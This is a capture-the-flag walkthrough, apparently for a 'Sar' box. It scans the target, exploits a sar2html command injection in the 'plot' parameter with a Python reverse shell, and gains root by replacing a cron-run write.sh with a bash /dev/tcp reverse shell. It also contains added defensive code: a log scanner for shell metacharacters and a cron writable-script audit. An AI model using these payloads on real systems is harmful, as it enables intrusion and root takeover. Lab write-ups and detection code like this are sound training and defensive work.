nmap -A -p- -oA sar 192.168.152.35 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -sC -sV -O -p- -oA sar 192.168.152.35

nmap -sU -O -p- -oA sar-udp 192.168.152.35

nikto -h 192.168.152.35:80

Pasted image 20210816133925.png

nmap -sCV -p80,443 192.168.152.35 -oN targeted

Pasted image 20210915174250.png

Pasted image 20210915174430.png

whatweb http://192.168.152.35

Pasted image 20210915174510.png

http://192.168.152.35

Pasted image 20210915174654.png

http://192.168.152.35/root.txt

Pasted image 20210915174634.png

searchsploit sar2html 3.2.1

Pasted image 20210915175132.png

http://192.168.152.35/sar2HTML/index.php?plot=;python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.49.152",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

We go to the address above.
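The request above abuses the `plot` parameter of sar2HTML by placing shell metacharacters in a value that is meant to be a sar file name. From the defender's side, that pattern is easy to spot in web server logs. The following is an added example, not part of the original write-up and not sar2html project code: it parses constructed Apache combined-format access log lines (sample data only), extracts the query parameters itself (so that a `;` in a value is never treated as a parameter separator, which some query parsers do), and flags any watched parameter whose value contains shell metacharacters. The parameter names and the sample IPs are assumptions for the demonstration.

```python
import re
from urllib.parse import unquote_plus

# Constructed Apache combined-format lines for the demonstration (not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [15/Sep/2021:18:10:02 +0000] "GET /sar2HTML/index.php?plot=;python3%20-c%20%27import%20socket%27 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.7 - - [15/Sep/2021:18:11:45 +0000] "GET /sar2HTML/index.php?plot=sar01-09-2021 HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
10.0.0.9 - - [15/Sep/2021:18:12:13 +0000] "GET /sar2HTML/index.php?plot=x%7Cid HTTP/1.1" 200 300 "-" "curl/7.68.0"
10.0.0.9 - - [15/Sep/2021:18:12:40 +0000] "POST /sar2HTML/index.php HTTP/1.1" 302 0 "-" "curl/7.68.0"
"""

# client ip, timestamp, method, request target and status code of a combined-format line
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)
# Characters that start a second command or a substitution in a POSIX shell.
# A legitimate sar file name never contains any of them.
META_RE = re.compile(r'[;|&`$\n]')


def parse_query(target):
    """Split the query string on '&' only, so ';' stays inside the value."""
    params = {}
    if "?" not in target:
        return params
    for pair in target.split("?", 1)[1].split("&"):
        if not pair:
            continue
        key, _, value = pair.partition("=")
        params.setdefault(unquote_plus(key), []).append(unquote_plus(value))
    return params


def parse_line(line):
    """Return a dict with ip, ts, method, target, status and decoded params, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["params"] = parse_query(rec["target"])
    return rec


def find_injection_attempts(log_text, watched_params=("plot",)):
    """Flag requests whose watched parameter values contain shell metacharacters."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        for name in watched_params:
            for value in rec["params"].get(name, []):
                if META_RE.search(value):
                    hits.append({"ip": rec["ip"], "ts": rec["ts"],
                                 "param": name, "value": value})
    return hits


if __name__ == "__main__":
    for hit in find_injection_attempts(SAMPLE_LOG):
        print(f"{hit['ts']} {hit['ip']} {hit['param']}={hit['value']!r}")
```

On the constructed sample the first and third lines are reported; the second line carries an ordinary sar file name and is left alone. In production the same check belongs on the server side as input validation (an allowlist of existing sar file names for `plot`) rather than only in the log review.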

nc -lvnp 443

python3 -m http.server 80

cd /tmp

wget http://192.168.49.152/linpeas.sh

chmod +x linpeas.sh

./linpeas.sh

Pasted image 20210915181121.png

We see that a script called write.sh is run.

Pasted image 20210915181500.png

We delete the write.sh file and create a new one.

Pasted image 20210915181839.png

#!/bin/bash
# replacement write.sh: connects back to the listener started with nc -lvnp 443
bash -i >& /dev/tcp/192.168.49.152/443 0>&1

We make a new script.

python3 -m http.server 8888

wget http://192.168.49.152:8888/write.sh

Pasted image 20210915182702.png

chmod 777 write.sh

Pasted image 20210915183552.png

nc -lvnp 443

Pasted image 20210915183626.png
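The privilege escalation above works because a script run from cron as root can be replaced by a low-privileged user. The following is an added example, not from the original write-up: a small audit that reads crontab text in `/etc/crontab` format (with the user field), pulls the absolute paths out of each job's command, and reports those that exist and are writable by group or others. The crontab lines and the script files it checks are constructed in a temporary directory for the demonstration; the real cron entry on the box is only visible in the screenshot and is not reproduced here.

```python
import os
import re
import stat
import tempfile

# One /etc/crontab-style job: five schedule fields (or an @keyword), a user, then the command.
CRON_RE = re.compile(r'^\s*(?:@\w+\s+|(?:\S+\s+){5})(?P<user>\S+)\s+(?P<cmd>.+)$')
# Absolute paths inside a command string (e.g. /usr/local/bin/write.sh).
PATH_RE = re.compile(r'(?<![\w/])/[\w./-]+')


def commands_from_crontab(text):
    """Return (user, command) pairs, skipping comments, blank lines and VAR=value lines."""
    jobs = []
    for line in text.splitlines():
        if not line.strip() or line.lstrip().startswith("#") or re.match(r'^\s*\w+=', line):
            continue
        m = CRON_RE.match(line)
        if m:
            jobs.append((m.group("user"), m.group("cmd")))
    return jobs


def writable_by_others(path):
    """True if the group or world write bit is set on the file."""
    return bool(os.stat(path).st_mode & (stat.S_IWGRP | stat.S_IWOTH))


def audit_cron(text):
    """Report scripts referenced by cron jobs that a non-owner could modify."""
    findings = []
    for user, cmd in commands_from_crontab(text):
        for path in PATH_RE.findall(cmd):
            if os.path.isfile(path) and writable_by_others(path):
                findings.append({"user": user, "path": path,
                                 "mode": oct(os.stat(path).st_mode & 0o777)})
    return findings


def make_constructed_lab():
    """Create two throwaway scripts, one world-writable, and a crontab text that runs them.

    Returns (crontab_text, path_of_the_weak_script). Constructed test data only.
    """
    workdir = tempfile.mkdtemp(prefix="cron-audit-")
    weak = os.path.join(workdir, "write.sh")
    safe = os.path.join(workdir, "backup.sh")
    for path in (weak, safe):
        with open(path, "w") as fh:
            fh.write("#!/bin/bash\necho ok\n")
    os.chmod(weak, 0o777)   # the misconfiguration: anyone can rewrite a root cron job
    os.chmod(safe, 0o755)   # owner-only write, as it should be
    crontab_text = (
        "SHELL=/bin/sh\n"
        "# constructed crontab for the demonstration\n"
        f"*/5 * * * * root {weak}\n"
        f"0 3 * * * root {safe} --full\n"
        f"@reboot root {safe}\n"
    )
    return crontab_text, weak


if __name__ == "__main__":
    text, _ = make_constructed_lab()
    for finding in audit_cron(text):
        print(f"{finding['user']} runs {finding['path']} (mode {finding['mode']})")
```

Only the 0777 script is reported; the 0755 one is referenced twice and ignored both times. A real audit would read `/etc/crontab`, `/etc/cron.d/*` and the per-user spools, and would also check that the directories on the path to each script are not writable by others, since a writable parent directory allows the same substitution.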


Copyright © 2022 Cu3rv0x, all rights reserved.